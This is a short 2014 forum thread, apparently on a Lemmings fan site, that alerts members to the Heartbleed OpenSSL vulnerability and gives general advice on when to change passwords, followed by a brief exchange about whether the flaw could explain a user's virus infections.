Author Topic: "Heartbleed" SSL vulnerability  (Read 2161 times)

0 Members and 1 Guest are viewing this topic.

Offline Prob Lem

  • Posts: 571
    • View Profile
"Heartbleed" SSL vulnerability
« on: April 10, 2014, 09:58:26 PM »
Just a quick heads-up in case this news has passed anyone by: There's been a vulnerability discovered in OpenSSL that makes it possible for eviltons and ne'er-do-wells to eavesdrop on connections that should be secure. There's a decent-enough summary of it on the BBC News website, here.

Depending on the services you use, you may want to hold off on changing all passwords immediately, though - if you do so with services which have not yet both patched their OpenSSL installations *and* re-generated their security certificates, it's a pointless exercise, as there may be a potential risk of this information being exposed if attackers hit that service, and you'll just need to do it all over again when they do patch and update their certificates.

There is a tool for checking whether servers are or were affected, and have or have not yet been fixed, and password-management services such as LastPass are providing updates on which passwords users do and don't need to deal with right now, from within their tools.

Offline mobius

  • Posts: 2759
  • relax.
    • View Profile
Re: "Heartbleed" SSL vulnerability
« Reply #1 on: April 10, 2014, 10:15:44 PM »
thanks for your continual effort of pointing these things out  :thumbsup:

I heard about this. It might explain my plague of viruses last year...  :-\
everything by me: https://www.lemmingsforums.net/index.php?topic=5982.msg96035#msg96035

"Not knowing how near the truth is, we seek it far away."
-Hakuin Ekaku

"I have seen a heap of trouble in my life, and most of it has never come to pass" - Mark Twain


Offline Prob Lem

  • Posts: 571
    • View Profile
Re: "Heartbleed" SSL vulnerability
« Reply #2 on: April 10, 2014, 10:35:20 PM »
Heh, no problem. :D I think it's important to post a heads-up, even when it's fairly likely everyone else already knows, just in case someone doesn't!

As far as viruses go, I'd say that that's unlikely to be related to this - this one is (generally, unless you're for some reason running an SSL service on your home box) on the server-side, so eviltons are much more likely to be targetting companies holding information that's of (or potentially of) financial value to them.